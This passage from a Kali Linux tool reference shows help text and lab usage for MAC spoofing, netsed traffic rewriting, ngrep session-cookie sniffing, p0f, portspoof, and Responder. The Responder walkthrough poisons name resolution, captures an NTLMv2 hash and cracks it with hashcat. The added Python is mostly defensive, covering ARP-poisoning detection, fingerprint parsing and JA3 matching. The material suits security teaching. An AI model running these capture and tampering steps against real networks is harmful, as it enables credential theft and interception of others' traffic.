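        if pkt is None:
            return None
        ip, mac = pkt["sender_ip"], pkt["sender_mac"]
        known = self.table.setdefault(ip, mac)
        if known != mac:
            sev = "HIGH" if ip in self.protected else "MEDIUM"
            self.alerts.append(f"[{sev}] {ip} changed {known} -> {mac} ({pkt['op']})")
        return pkt


def demo():
    """Constructed sequence: a normal request/reply, then a reply claiming the gateway IP
    from a different MAC, which is what an ARP-poisoning MITM looks like on the wire."""
    watch = ArpWatch(protected_ips=["192.168.11.1"])
    frames = [
        make_arp_hex(1, GW_MAC, "192.168.11.1", "00:00:00:00:00:00", "192.168.11.4"),
        make_arp_hex(2, HOST_MAC, "192.168.11.4", GW_MAC, "192.168.11.1", dst_mac=GW_MAC),
        make_arp_hex(2, EVIL_MAC, "192.168.11.1", HOST_MAC, "192.168.11.4", dst_mac=HOST_MAC),
    ]
    for f in frames:
        watch.feed(f)
    return watch.alerts


if __name__ == "__main__":
    for alert in demo():
        print(alert)
```

The first-seen binding is kept on purpose so that every further poisoned reply raises an alert; in production you would age entries out (DHCP reassignments do legitimately change bindings) and prefer static ARP entries or dynamic ARP inspection on the switch for the gateway.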
GNU MAC Changer
Changes the MAC address of a network interface.
■ Usage
root@kali:~# macchanger --help
GNU MAC Changer
Usage: macchanger [options] device
-h, --help Print this help
-V, --version Print version and exit
-s, --show Print the MAC address and exit
-e, --ending Don't change the vendor bytes
-a, --another Set random vendor MAC of the same kind
-A Set random vendor MAC of any kind
-p, --permanent Reset to original, permanent hardware MAC
-r, --random Set fully random MAC
-l, --list[=keyword] Print known vendors
-b, --bia Pretend to be a burned-in-address
-m, --mac=XX:XX:XX:XX:XX:XX
--mac XX:XX:XX:XX:XX:XX Set the MAC XX:XX:XX:XX:XX:XX
■ Usage example
root@kali:~# ip link show eth0
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP mode DEFAULT group default
link/ether 96:00:02:ae:08:aa brd ff:ff:ff:ff:ff:ff link-netnsid 0
root@kali:~# macchanger -e eth0
Current MAC: 96:00:02:ae:08:aa (unknown)
Permanent MAC: 96:00:02:ae:08:aa (unknown)
New MAC: 94:00:02:e0:66:95 (unknown)
root@kali:~# ip link show eth0
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP mode DEFAULT group default
link/ether 94:00:02:e0:66:95 brd ff:ff:ff:ff:ff:ff link-netnsid 0
Netsed
Modifies the contents of packets transferred over the network in real time.
■ Usage
root@kali:~# netsed --help
Usage: netsed [option] proto lport rhost rport rule1 [ rule2 ... ]
options - can be --ipv4 or -4 to force address resolution in IPv4,
--ipv6 or -6 to force address resolution in IPv6,
--ipany to resolve the address in either IPv4 or IPv6.
- --help or -h to display this usage information.
proto - protocol specification (tcp or udp)
lport - local port to listen on (see README for transparent
traffic intercepting on some systems)
rhost - where connection should be forwarded (0 = use destination
address of incoming connection, see README)
rport - destination port (0 = dst port of incoming connection)
ruleN - replacement rules (see below)
General syntax of replacement rules: s/pat1/pat2[/expire]
■ Usage example
# On host A, listen for packets on port 8080
root@kali_a:~# ncat -l 8080 --keep-open
# Send an HTTP request from host B to host A
root@kali_b:~# curl http://192.168.11.4:8080
# The request contents are displayed on host A
root@kali_a:~# ncat -l 8080 --keep-open
GET / HTTP/1.1
Host: 192.168.11.4:8080
User-Agent: curl/8.9.1
Accept: */*
# On host C, listen for TCP on port 8080, rewrite the HTTP header and forward to host A
root@kali_c:~# netsed tcp 8080 192.168.11.4 8080 's/GET %2f HTTP%2f1.1/DELETE %2f HTTP%2f1.1/' 's/Host: 192.168.11.3/Host: 192.168.11.4/'
netsed 1.2 by Julien VdG <julien@silicone.homelinux.org>
based on 0.01c from Michal Zalewski <lcamtuf@ids.pl>
[*] Parsing rule s/GET %2f HTTP%2f1.1/DELETE %2f HTTP%2f1.1/...
[*] Parsing rule s/Host: 192.168.11.3/Host: 192.168.11.4/...
[+] Loaded 2 rules...
[+] Using fixed forwarding to 192.168.11.4,8080.
[+] Listening on port 8080/tcp.
# Send an HTTP request from host B to host C
root@kali_b:~# curl http://192.168.11.3:8080
# The contents rewritten by host C are displayed on host A
root@kali_a:~# ncat -l 8080 --keep-open
GET / HTTP/1.1
Host: 192.168.11.4:8080
User-Agent: curl/8.9.1
Accept: */*
DELETE / HTTP/1.1
Host: 192.168.11.4:8080
User-Agent: curl/8.9.1
Accept: */*
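The two rules in the example use `%2f` for the slashes because `/` is the rule delimiter; netsed decodes such `%XX` escapes in both patterns, and the optional `[/expire]` suffix limits how long a rule stays active. As an added example, not code from the page or the netsed project, the Python below implements that rule syntax and applies a rule set to one chunk of intercepted data, reproducing the GET-to-DELETE and Host-header rewrite shown above. The interpretation of `expire` as "stop after N replacements" is my reading of the usage text, not something the page states; the request bytes are reconstructed from the page's output.

```python
import re
from dataclasses import dataclass


def _unescape(pattern: str) -> bytes:
    """Decode netsed-style %XX escapes (e.g. %2f for '/'); anything else is literal."""
    out, i = bytearray(), 0
    while i < len(pattern):
        if pattern[i] == "%" and i + 2 < len(pattern):
            try:
                out.append(int(pattern[i + 1:i + 3], 16))
                i += 3
                continue
            except ValueError:
                pass                      # not a hex pair: treat '%' literally
        out += pattern[i].encode()
        i += 1
    return bytes(out)


@dataclass
class Rule:
    pattern: bytes
    replacement: bytes
    expire: int = 0      # 0 = never expires; N = disable after N replacements (assumption)
    hits: int = 0


def parse_rule(text: str) -> Rule:
    """Parse 's/pat1/pat2[/expire]'. A '/' inside a pattern must be written as %2f."""
    m = re.fullmatch(r"s/([^/]*)/([^/]*)(?:/(\d*))?", text)
    if not m or m.group(1) == "":
        raise ValueError(f"bad rule: {text!r}")
    return Rule(_unescape(m.group(1)), _unescape(m.group(2)), int(m.group(3) or 0))


def apply_rules(data: bytes, rules) -> bytes:
    """Apply every live rule, in order, to one chunk of data; rules are stateful (hits)."""
    for r in rules:
        pos = 0
        while not (r.expire and r.hits >= r.expire):
            idx = data.find(r.pattern, pos)
            if idx < 0:
                break
            data = data[:idx] + r.replacement + data[idx + len(r.pattern):]
            pos = idx + len(r.replacement)
            r.hits += 1
    return data


# The request host B sends, reconstructed from the page's ncat output.
REQUEST = (b"GET / HTTP/1.1\r\nHost: 192.168.11.3:8080\r\n"
           b"User-Agent: curl/8.9.1\r\nAccept: */*\r\n\r\n")


def rewrite_sample() -> bytes:
    """The page's two rules applied to the page's request."""
    rules = [parse_rule("s/GET %2f HTTP%2f1.1/DELETE %2f HTTP%2f1.1/"),
             parse_rule("s/Host: 192.168.11.3/Host: 192.168.11.4/")]
    return apply_rules(REQUEST, rules)


if __name__ == "__main__":
    print(rewrite_sample().decode())
```

Note what the rewrite does not do: it matches on whatever bytes happen to be in one read, so a pattern split across two TCP segments is missed, and the rewritten request keeps its original Content-Length and framing. Both limits matter when reasoning about what an in-path rewriter can and cannot alter, and both disappear once the connection is protected by TLS with certificate validation.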
ngrep
Analyzes packets. You can match regular expressions or hexadecimal patterns against the packet data payload and also specify BPF filter logic.
■ Usage
root@kali:~# ngrep -h
usage: ngrep <-hNXViwqpevxlDtTRM> <-IO pcap_dump> <-n num> <-d dev> <-A num>
<-s snaplen> <-S limitlen> <-W normal|byline|single|none> <-c cols>
<-P char> <-F file> <-K count>
<match expression> <bpf filter>
-h is help/usage
-V is version information
-q is be quiet (don't print packet reception hash marks)
-e is show empty packets
-i is ignore case
-v is invert match
-R is don't do privilege revocation logic
-x is print in alternate hexdump format
-X is interpret match expression as hexadecimal
-w is word-regex (expression must match as a word)
-p is don't go into promiscuous mode
-l is make stdout line buffered
-D is replay pcap_dumps with their recorded time intervals
-t is print timestamp every time a packet is matched
-T is print delta timestamp every time a packet is matched
specify twice for delta from first match
-M is don't do multi-line match (do single-line match instead)
-I is read packet stream from pcap format file pcap_dump
-O is dump matched packets in pcap format to pcap_dump
-n is look at only num packets
-A is dump num packets after a match
-s is set the bpf caplen
-S is set the limitlen on matched packets
-W is set the dump format (normal, byline, single, none)
-c is force the column width to the specified size
-P is set the non-printable display char to what is specified
-F is read the bpf filter from the specified file
-N is show sub protocol number
-d is use specified device instead of the pcap default
-K is send N packets to kill observed connections
■ Usage example
# Sniff traffic destined for port 80 that contains the string "PHPSESSID"
root@kali:~# ngrep -d eth0 -t 'PHPSESSID' tcp and dst port 80
interface: eth0 (192.168.11.0/255.255.255.0)
filter: ( tcp and dst port 80 ) and ((ip || ip6) || (vlan && (ip || ip6)))
match (JIT): PHPSESSID
# Matching traffic is displayed
T 2024/10/30 03:09:29.287955 192.168.11.3:32974 -> 192.168.11.4:80 [AP] #5
GET /login.php HTTP/1.1..Host: 192.168.11.4..User-Agent: curl/8.9.1..Accept: */*..Cookie: PHPSESSID=07339191351e517568d7486c2220c62a....
# Search a packet dump file and display the matching traffic
root@kali:~# ngrep -I dump.pcap 'PHPSESSID' tcp and dst port 80
input: dump.pcap
filter: ( tcp and dst port 80 ) and ((ip || ip6) || (vlan && (ip || ip6)))
match (JIT): PHPSESSID
##########
T 192.168.11.3:45448 -> 192.168.11.4:80 [AP] #12
GET /login.php HTTP/1.1..Host: 192.168.11.4..User-Agent: curl/8.9.1..Accept: */*..Cookie: PHPSESSID=07339191351e517568d7486c2220c62a....
###exit
P0f
Analyzes received traffic using fingerprints and displays information such as the sender's operating system.
■ Usage
root@kali:~# p0f -h
Usage: p0f [ ...options... ] [ 'filter rule' ]
Network interface options:
-i iface - listen on the specified network interface
-r file - read offline pcap data from a given file
-p - put the listening interface in promiscuous mode
-L - list all available interfaces
Operating mode and output settings:
-f file - read fingerprint database from 'file' (/etc/p0f/p0f.fp)
-o file - write information to the specified log file
-s name - answer to API queries at a named unix socket
-u user - switch to the specified unprivileged account and chroot
-d - fork into background (requires -o or -s)
Performance-related options:
-S limit - limit number of parallel API connections (20)
-t c,h - set connection / host cache age limits (30s,120m)
-m c,h - cap the number of active connections / hosts (1000,10000)
■ Usage example
root@kali:~# p0f -i eth0 'dst port 80'
[+] Closed 1 file descriptor.
[+] Loaded 322 signatures from '/etc/p0f/p0f.fp'.
[+] Intercepting traffic on interface 'eth0'.
[+] Custom filtering rule enabled: dst port 80 [+VLAN]
[+] Entered main event loop.
.-[ 192.168.11.4/49186 -> 192.168.11.3/80 (syn) ]-
|
| client = 192.168.11.4/49186
| os = Linux 2.2.x-3.x
| dist = 0
| params = generic
| raw_sig = 4:64+0:0:1460:mss*44,7:mss,sok,ts,nop,ws:df,id+:0
|
`----
.-[ 192.168.11.4/49186 -> 192.168.11.3/80 (mtu) ]-
|
| client = 192.168.11.4/49186
| link = Ethernet or modem
| raw_mtu = 1500
|
`----
[...]
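The `raw_sig` line in the p0f output is the whole basis of the OS guess: `4:64+0:0:1460:mss*44,7:mss,sok,ts,nop,ws:df,id+:0` means IPv4, observed TTL 64 at an estimated distance of 0 hops, no IP options, MSS 1460, a window of 44 times the MSS with window scale 7, the option layout mss/sok/ts/nop/ws, the quirks "DF set" and "non-zero IP ID with DF", and no payload on the SYN; the `raw_mtu = 1500` block is simply MSS plus 40 bytes of IPv4 and TCP headers. As an added example, not code from the page or the p0f project, the Python below builds a constructed IPv4 SYN with those properties and derives the same signature string from it. It implements a subset of p0f's quirk checks (the ones listed in the comments) and treats an absent window-scale option as scale 0; the addresses, ports and sequence numbers are made up.

```python
import struct

_OPT_NAMES = {1: "nop", 2: "mss", 3: "ws", 4: "sok", 5: "sack", 8: "ts"}


def build_syn(ttl=64, ipid=0x1234, df=True, mss=1460, wscale=7, window=None,
              sport=49186, dport=80) -> bytes:
    """Constructed IPv4/TCP SYN resembling the Linux client in the page's p0f run."""
    if window is None:
        window = mss * 44
    opts = (struct.pack("!BBH", 2, 4, mss)             # mss
            + b"\x04\x02"                               # sok
            + struct.pack("!BBII", 8, 10, 123456, 0)    # ts (TSval set, TSecr 0)
            + b"\x01"                                   # nop
            + struct.pack("!BBB", 3, 3, wscale))        # ws
    doff = (20 + len(opts)) // 4
    tcp = struct.pack("!HHIIHHHH", sport, dport, 1000, 0, (doff << 12) | 0x002, window, 0, 0) + opts
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), ipid, 0x4000 if df else 0,
                     ttl, 6, 0, bytes([192, 168, 11, 4]), bytes([192, 168, 11, 3]))
    return ip + tcp


def mtu_from_mss(mss: int) -> int:
    """p0f's raw_mtu for IPv4: MSS + 20 (IP) + 20 (TCP)."""
    return mss + 40


def tcp_syn_signature(pkt: bytes) -> str:
    """p0f v3 style 'ver:ttl+dist:olen:mss:wsize,scale:olayout:quirks:pclass' for one IPv4 SYN."""
    if pkt[0] >> 4 != 4:
        raise ValueError("IPv4 only in this example")
    ihl = (pkt[0] & 0x0F) * 4
    total_len, ipid, flags_frag = struct.unpack("!HHH", pkt[2:8])
    df, ttl = bool(flags_frag & 0x4000), pkt[8]
    tcp = pkt[ihl:total_len]
    _sp, _dp, seq, ack, off_flags, window, _csum, urg = struct.unpack("!HHIIHHHH", tcp[:20])
    doff, flags = (off_flags >> 12) * 4, off_flags & 0x1FF
    payload, opts = tcp[doff:], tcp[20:doff]
    layout, mss, wscale, tsval, tsecr, i = [], None, None, None, None, 0
    while i < len(opts):
        kind = opts[i]
        if kind == 0:                                   # end of options, rest is padding
            layout.append(f"eol+{len(opts) - i - 1}")
            break
        if kind == 1:
            layout.append("nop")
            i += 1
            continue
        ln = opts[i + 1] if i + 1 < len(opts) else 0
        if ln < 2:
            layout.append("bad")
            break
        body = opts[i + 2:i + ln]
        layout.append(_OPT_NAMES.get(kind, f"?{kind}"))
        if kind == 2:
            mss = struct.unpack("!H", body)[0]
        elif kind == 3:
            wscale = body[0]
        elif kind == 8:
            tsval, tsecr = struct.unpack("!II", body)
        i += ln
    # p0f guesses the initial TTL as the next of 32/64/128/255 and prints observed+distance.
    init = next(t for t in (32, 64, 128, 255) if t >= ttl)
    wsize = f"mss*{window // mss}" if mss and window % mss == 0 else str(window)
    quirks = []
    if df:
        quirks.append("df")
    if df and ipid:
        quirks.append("id+")               # DF set but IP ID still non-zero
    if not df and not ipid:
        quirks.append("id-")               # DF clear and IP ID zero
    if flags & 0x1C0:
        quirks.append("ecn")               # NS/CWR/ECE on the SYN
    if seq == 0:
        quirks.append("seq-")
    if ack and not flags & 0x10:
        quirks.append("ack+")
    if not ack and flags & 0x10:
        quirks.append("ack-")
    if urg and not flags & 0x20:
        quirks.append("uptr+")
    if flags & 0x20:
        quirks.append("urgf+")
    if flags & 0x08:
        quirks.append("pushf+")
    if tsval == 0:
        quirks.append("ts1-")              # own timestamp zero
    if tsecr:
        quirks.append("ts2+")              # peer timestamp non-zero on a SYN
    return (f"4:{ttl}+{init - ttl}:{ihl - 20}:{mss or 0}:{wsize},{wscale or 0}:"
            f"{','.join(layout)}:{','.join(quirks)}:{'+' if payload else '0'}")


if __name__ == "__main__":
    pkt = build_syn()
    print("raw_sig =", tcp_syn_signature(pkt))
    print("raw_mtu =", mtu_from_mss(1460))
    print("6 hops away:", tcp_syn_signature(build_syn(ttl=58)))
```

Passive fingerprinting of this kind is valuable on the defensive side precisely because it never sends a packet: a SYN whose signature says "Windows" arriving from an address your inventory lists as a Linux appliance is worth a look, and the hop-distance estimate in `ttl+dist` is a cheap check against addresses that claim to be on the local segment.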
Portspoof
Returns spoofed results to an attacker's port scans, hindering identification of the services actually running as far as possible.
■ Usage
root@kali:~# portspoof -h
Usage: portspoof [OPTION]...
-i ip : Bind to a particular IP address
-p port : Bind to a particular PORT number
-s file_path : Portspoof service signature regex. file
-c file_path : Portspoof configuration file
-l file_path : Log port scanning alerts to a file
-f file_path : FUZZER_MODE - fuzzing payload file list
-n file_path : FUZZER_MODE - wrapping signatures file list
-1 FUZZER_MODE - generate fuzzing payloads internally
-2 switch to simple reply mode (doesn't work for Nmap)!
-D run as daemon process
-d disable syslog
-v be verbose
-h display this help and exit
■ Usage example
# Port scan result against the target before portspoof is started (only an SSH server is running)
root@kali_attacker:~# nmap -sV --top-ports 20 192.168.11.4
PORT STATE SERVICE VERSION
21/tcp closed ftp
22/tcp open ssh OpenSSH 9.9p1 Debian 2 (protocol 2.0)
23/tcp closed telnet
25/tcp closed smtp
53/tcp closed domain
80/tcp closed http
110/tcp closed pop3
111/tcp closed rpcbind
135/tcp closed msrpc
139/tcp closed netbios-ssn
143/tcp closed imap
443/tcp closed https
445/tcp closed microsoft-ds
993/tcp closed imaps
995/tcp closed pop3s
1723/tcp closed pptp
3306/tcp closed mysql
3389/tcp closed ms-wbt-server
5900/tcp closed vnc
8080/tcp closed http-proxy
# On the target host
# Redirect TCP connections to every port other than 22 (SSH) to port 4444
root@kali_target:~# iptables -t nat -A PREROUTING -p tcp -m multiport --dports 1:21,23:65535 -j REDIRECT --to-ports 4444
# Start portspoof (port 4444 is used when no port number is specified)
root@kali_target:~# portspoof -s /etc/portspoof/portspoof_signatures
-> Using user defined signature file /etc/portspoof/portspoof_signatures
# Port scan result against the target after portspoof is started
root@kali_attacker:~# nmap -sV --top-ports 20 192.168.11.4
# Spoofed service signatures are returned at random, so arbitrary software names are displayed
PORT STATE SERVICE VERSION
21/tcp open ftp?
22/tcp open ssh OpenSSH 9.9p1 Debian 2 (protocol 2.0)
23/tcp open telnet?
25/tcp open mogilefs MogileFS distributed filesystem
53/tcp open domain?
80/tcp open telnet InterSystems CTELNETD
110/tcp open pop3?
111/tcp open ssh (protocol 91)
135/tcp open jrpgt JRPGT game server
139/tcp open netbios-ssn?
143/tcp open telnet Lantronix MSS100 serial interface telnetd 0
443/tcp open sip Microsoft Office Communications Service 2005
445/tcp open http X10 ActivePhone remote control httpd uKMjuI
993/tcp open telnet Huawei Access Runner ADSL telnetd
995/tcp open pop3s?
1723/tcp open ftp Medusa Async ftpd 11Y >.
3306/tcp open http Aladdin HASP license manager 460156
3389/tcp open http NetXMS httpd
5900/tcp open irc IRCnet-based ircd
8080/tcp open ftp HP166XC KrD Logic Analyzer ftpd (FUSION ftpd ZeIENwC)
7 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
Responder
Performs LLMNR/NBT-NS/mDNS spoofing, with built-in rogue HTTP/SMB/MSSQL/FTP/LDAP authentication servers that support NTLMv1/NTLMv2/LMv2, NTLMSSP and Basic HTTP authentication.
■ Usage
root@kali:~# responder --help
Usage: responder -I eth0 -w -d
or:
responder -I eth0 -wd
Options:
--version show program's version number and exit
-h, --help show this help message and exit
-A, --analyze Analyze mode. This option allows you to see NBT-NS,
BROWSER, LLMNR requests without responding.
-I eth0, --interface=eth0
Network interface to use, you can use 'ALL' as a
wildcard for all interfaces
-i 10.0.0.21, --ip=10.0.0.21
Local IP to use (only for OSX)
-6 2002:c0a8:f7:1:3ba8:aceb:b1a9:81ed, --externalip6=2002:c0a8:f7:1:3ba8:aceb:b1a9:81ed
Poison all requests with another IPv6 address than
Responder's one.
-e 10.0.0.22, --externalip=10.0.0.22
Poison all requests with another IP address than
Responder's one.
-b, --basic Return a Basic HTTP authentication. Default: NTLM
-d, --DHCP Enable answers for DHCP broadcast requests. This
option will inject a WPAD server in the DHCP response.
Default: False
-D, --DHCP-DNS This option will inject a DNS server in the DHCP
response, otherwise a WPAD server will be added.
Default: False
-w, --wpad Start the WPAD rogue proxy server. Default value is
False
-u UPSTREAM_PROXY, --upstream-proxy=UPSTREAM_PROXY
Upstream HTTP proxy used by the rogue WPAD Proxy for
outgoing requests (format: host:port)
-F, --ForceWpadAuth Force NTLM/Basic authentication on wpad.dat file
retrieval. This may cause a login prompt. Default:
False
-P, --ProxyAuth Force NTLM (transparently)/Basic (prompt)
authentication for the proxy. WPAD doesn't need to be
ON. This option is highly effective. Default: False
-Q, --quiet Tell Responder to be quiet, disables a bunch of
printing from the poisoners. Default: False
--lm Force LM hashing downgrade for Windows XP/2003 and
earlier. Default: False
--disable-ess Force ESS downgrade. Default: False
-v, --verbose Increase verbosity.
-t 1e, --ttl=1e Change the default Windows TTL for poisoned answers.
Value in hex (30 seconds = 1e). use '-t random' for
random TTL
■ Usage example
# Start Responder
root@kali:~# responder -I eth0 -w -Q
[+] Poisoners:
LLMNR [ON]
NBT-NS [ON]
MDNS [ON]
DNS [ON]
DHCP [OFF]
[+] Servers:
HTTP server [ON]
HTTPS server [ON]
WPAD proxy [ON]
Auth proxy [OFF]
SMB server [ON]
Kerberos server [ON]
SQL server [ON]
FTP server [ON]
IMAP server [ON]
POP3 server [ON]
SMTP server [ON]
DNS server [ON]
LDAP server [ON]
MQTT server [ON]
RDP server [ON]
DCE-RPC server [ON]
WinRM server [ON]
SNMP server [OFF]
[...]
[+] Listening for events...
[+] Responder is in quiet mode. No NBT-NS, LLMNR, MDNS messages will print to screen.
When you enter an arbitrary network share path in Explorer on a Windows client, you are prompted for credentials; enter them.
# The credentials the user entered are recorded in the log
root@kali:~# cat /usr/share/responder/logs/SMB-NTLMv2-SSP-2400:4152:4321:9c10:10da:bc40:5cbe:148d.txt | grep hello
hello::PC-H4DSCFC:931bb014658bde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
# Check which Hashcat mode the hash value corresponds to
root@kali:~# cat hash.txt | hashid -m
Analyzing 'hello::PC-H4DSCFC:465c5da9cbe544fd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
[+] NetNTLMv2 [Hashcat Mode: 5600]
# Crack with Hashcat
root@kali:~# hashcat -a 3 -m 5600 hash.txt ?l?l?l?l?l
hashcat (v6.2.6) starting
[...]
HELLO::PC-H4DSCFC:465c5da9cbe544fd:5474f2a7a46bd2ae6e62d6bb8f1cbd8b:0101000000000000001...:world
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 5600 (NetNTLMv2)
Hash.Target......: HELLO::PC-H4DSCFC:465c5da9cbe544fd:5474f2a7a46...000000
[...]
ssldump
An SSLv3/TLS network protocol analyzer. When it identifies SSLv3/TLS traffic, it decodes the records and prints them as text on standard output.
■ Usage
root@kali:~# man ssldump
SYNOPSIS
ssldump [ -aAdeFHjnNPqtTvxXyz ] [ -i interface ]
[ -k keyfile ] [ -l sslkeylogfile ] [ -p password ] [ -r dumpfile ] [ -w outputpcap ]
[ -S [crypto|d|ht|H|nroff] ] [ expression ]
OPTIONS
-a Print bare TCP ACKs (useful for observing Nagle behavior).
-A Print all record fields (by default ssldump chooses the most interesting fields).
-d Display the application data traffic. This usually means decrypting it, but when -d is used ssldump will also decode application
data traffic before the SSL session initiates. This allows you to see HTTPS CONNECT behavior as well as SMTP STARTTLS. As a side
effect, since ssldump can't tell whether plaintext is traffic before the initiation of an SSL connection or just a regular TCP
connection, this allows you to use ssldump to sniff any TCP connection. ssldump will automatically detect ASCII data and display
it directly to the screen. non-ASCII data is displayed as hex dumps. See also -X.
-e Print absolute timestamps instead of relative timestamps.
-F Specify the number of packets after which a connection pool cleaning is performed (in packets, default: 100).
-H Print the full SSL packet header.
-i interface
Use interface as the network interface on which to sniff SSL/TLS traffic.
-j Switch output format to JSON. Only stdout is affected by this toggle.
-k keyfile
Use keyfile as the location of the SSL keyfile (OpenSSL format) Previous versions of ssldump automatically looked in
./server.pem. Now you must specify your keyfile every time.
-l sslkeylogfile
Use sslkeylogfile as the location of the SSLKEYLOGFILE (https://developer.mozilla.org/en-US/docs/Mozilla/Projects/NSS/Key_Log_Format).
-n Don't try to resolve host names from IP addresses.
-N Attempt to parse ASN.1 when it appears, such as in certificates and DNs.
-p password
Use password as the SSL keyfile password.
-P Don't put the interface into promiscuous mode.
-q Don't decode any record fields beyond a single summary line. (quiet mode).
-r file
Read data from file instead of from the network. The old -f option still works but is deprecated and will probably be removed
with the next version.
-S [ crypto | d | ht | H ]
Specify SSL flags to ssldump. These flags include:
crypto Print cryptographic information.
d Print fields as decoded.
ht Print the handshake type.
H Print handshake type and highlights.
-t Specify the TTL for inactive connections referenced in the connection pool (in seconds, default: 100).
-T Print the TCP headers.
-w outputpcap
Use outputpcap as the destination for decrypted packets.
-x Print each record in hex, as well as decoding it.
-X When the -d option is used, binary data is automatically printed in two columns with a hex dump on the left and the printable
characters on the right. -X suppresses the display of the printable characters, thus making it easier to cut and paste the hex
data into some other program.
-y Decorate the output for processing with nroff/troff. Not very useful for the average user.
-z Add timestamp in front of TCP packet description (-T)
■ Example
# Send an HTTPS request
root@kali:~# curl -4 https://example.com
# Monitor traffic in real time and display SSLv3/TLS information
root@kali:~# ssldump -i eth0 -j -n -ANH | jq
{
"connection_number": 1,
"record_count": 1,
"timestamp": "1731827455.7356",
"src_name": "192.168.11.3",
"src_ip": "192.168.11.3",
"src_port": 43646,
"dst_name": "93.184.215.14",
"dst_ip": "93.184.215.14",
"dst_port": 443,
"record_len": 395,
"record_ver": "3.1",
"msg_type": "Handshake",
"handshake_type": "ClientHello",
"ja3_str": "771,4866-4867-4865-4868-49196-52393-49325-49162-49195-49324-49161-49200-52392-49172-49199-49171-157-49309-53-156-49308-47-159-52394-49311-57-158-49310-51,51-5-0-13-28-10-11-16-22-65281-43-23,23-24-25-29-30-256-257-258-259-260,0",
"ja3_fp": "ee839d543571bd085fedc8f6602abdf6"
}
[...]
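Added example (not ssldump's own code) for post-processing the JSON above: it parses the `ssldump -j` stream, splits `ja3_str` into its five fields, recomputes the JA3 hash (MD5 over `ja3_str` as printed, which is how JA3 is defined) and matches the ClientHello against a constructed inventory of known client fingerprints. The record, the `KNOWN_CLIENTS` labels and the hypothetical helper names are assumptions of this example.

```python
"""Parse ssldump -j output, recompute JA3 from ja3_str, and label the client.

JA3 = MD5("version,ciphers,extensions,curves,point_formats") with the values
inside each field joined by '-'; ssldump prints exactly that string as ja3_str.
"""
import hashlib
import json

# ja3_str / ja3_fp copied from the page's ssldump output for the curl ClientHello.
SAMPLE_JA3_STR = ("771,4866-4867-4865-4868-49196-52393-49325-49162-49195-49324-49161-"
                  "49200-52392-49172-49199-49171-157-49309-53-156-49308-47-159-52394-"
                  "49311-57-158-49310-51,51-5-0-13-28-10-11-16-22-65281-43-23,"
                  "23-24-25-29-30-256-257-258-259-260,0")
SAMPLE_JA3_FP = "ee839d543571bd085fedc8f6602abdf6"

# Constructed ssldump JSON stream (one record, reduced to the fields used here).
SAMPLE_OUTPUT = json.dumps({
    "connection_number": 1, "record_count": 1,
    "src_ip": "192.168.11.3", "src_port": 43646,
    "dst_ip": "93.184.215.14", "dst_port": 443,
    "record_ver": "3.1", "msg_type": "Handshake", "handshake_type": "ClientHello",
    "ja3_str": SAMPLE_JA3_STR, "ja3_fp": SAMPLE_JA3_FP,
})

# Constructed inventory: JA3 hash -> label of the client it was observed from.
KNOWN_CLIENTS = {SAMPLE_JA3_FP: "curl on the Kali host (page example)"}

TLS_VERSIONS = {769: "TLS 1.0", 770: "TLS 1.1", 771: "TLS 1.2", 772: "TLS 1.3"}
# GREASE values (0x0a0a, 0x1a1a, ..., 0xfafa) are excluded from JA3 by definition.
GREASE = set(range(0x0a0a, 0xfafb, 0x1010))
SUPPORTED_VERSIONS_EXT = 43  # TLS 1.3 clients signal it here, not in the version field


def iter_records(text):
    """Yield the JSON objects of an ssldump -j stream (newline-delimited or concatenated)."""
    dec = json.JSONDecoder()
    pos = 0
    while True:
        while pos < len(text) and text[pos].isspace():
            pos += 1
        if pos >= len(text):
            return
        obj, pos = dec.raw_decode(text, pos)
        yield obj


def parse_ja3_str(ja3_str):
    """Split ja3_str into its five fields; every value is decimal, '-' separated."""
    fields = ja3_str.split(",")
    if len(fields) != 5:
        raise ValueError("ja3_str must have exactly 5 comma-separated fields")

    def to_ints(field):
        return [int(v) for v in field.split("-")] if field else []

    parsed = {
        "version": int(fields[0]),
        "ciphers": to_ints(fields[1]),
        "extensions": to_ints(fields[2]),
        "curves": to_ints(fields[3]),
        "point_formats": to_ints(fields[4]),
    }
    # A GREASE value in the string means the producer did not filter it (JA3 would differ).
    parsed["has_grease"] = any(v in GREASE for v in
                               parsed["ciphers"] + parsed["extensions"] + parsed["curves"])
    return parsed


def ja3_fingerprint(ja3_str):
    """JA3 hash: MD5 hex digest of the raw ja3_str."""
    return hashlib.md5(ja3_str.encode("ascii")).hexdigest()


def analyze(text, known=KNOWN_CLIENTS):
    """Return one summary per ClientHello: parsed fields, recomputed hash, client label."""
    results = []
    for rec in iter_records(text):
        if rec.get("handshake_type") != "ClientHello" or "ja3_str" not in rec:
            continue
        parsed = parse_ja3_str(rec["ja3_str"])
        computed = ja3_fingerprint(rec["ja3_str"])
        results.append({
            "flow": f'{rec["src_ip"]}:{rec["src_port"]} -> {rec["dst_ip"]}:{rec["dst_port"]}',
            # 771 is the legacy ClientHello version; TLS 1.3 is offered via extension 43.
            "tls_version": TLS_VERSIONS.get(parsed["version"], hex(parsed["version"])),
            "offers_tls13": SUPPORTED_VERSIONS_EXT in parsed["extensions"],
            "cipher_count": len(parsed["ciphers"]),
            "reported_fp": rec.get("ja3_fp"),
            "computed_fp": computed,
            "fp_consistent": computed == rec.get("ja3_fp"),
            "client": known.get(computed, "unknown JA3 (review)"),
        })
    return results


if __name__ == "__main__":
    for summary in analyze(SAMPLE_OUTPUT):
        print(summary)
```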
tcpflow
A packet capture tool. It understands sequence numbers and correctly reconstructs and displays the data stream regardless of retransmissions or out-of-order delivery.
■ Usage
root@kali:~# tcpflow --help
usage: tcpflow [-aBcCDhIpsvVZ] [-b max_bytes] [-d debug_level]
[-[eE] scanner] [-f max_fds] [-F[ctTXMkmg]] [-h|--help] [-i iface]
[-l files...] [-L semlock] [-m min_bytes] [-o outdir] [-r file] [-R file]
[-S name=value] [-T template] [-U|--relinquish-privileges user] [-v|--verbose]
[-w file] [-x scanner] [-X xmlfile] [-z|--chroot dir] [expression]
-a: do ALL post-processing.
-b max_bytes: max number of bytes per flow to save
-d debug_level: debug level; default is 1
-f: maximum number of file descriptors to use
-h: print this help message (-hh for more help)
-H: print detailed information about each scanner
-i: network interface on which to listen
-I: write for each flow another file *.findx to provide byte-indexed timestamps
